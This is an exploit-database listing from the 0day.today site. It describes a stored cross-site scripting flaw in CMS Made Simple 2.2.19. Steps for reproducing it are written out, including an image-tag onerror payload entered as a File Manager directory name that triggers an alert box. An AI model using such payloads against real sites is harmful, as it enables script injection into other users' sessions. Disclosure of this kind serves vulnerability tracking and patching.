[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

CMS Made Simple 2.2.19 Cross Site Scripting Vulnerability

Author
tmrswrr
Risk
[
Security Risk Low
]
0day-ID
0day-ID-39355
Category
web applications
Date add
22-02-2024
Platform
php
# Exploit Title: CMS Made Simple Version: 2.2.19 - Stored XSS
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cmsmadesimple.org/
# Version: 2.2.19
# Tested on: https://www.softaculous.com/demos/CMS_Made_Simple


1 ) log in as admin and go to Content > File Manager 
2 ) Write in New directory: place payload "><img src=x onerrora=confirm() onerror=confirm(1)>
3 ) After click run you will be see alertbox

#  0day.today [2024-09-28]  #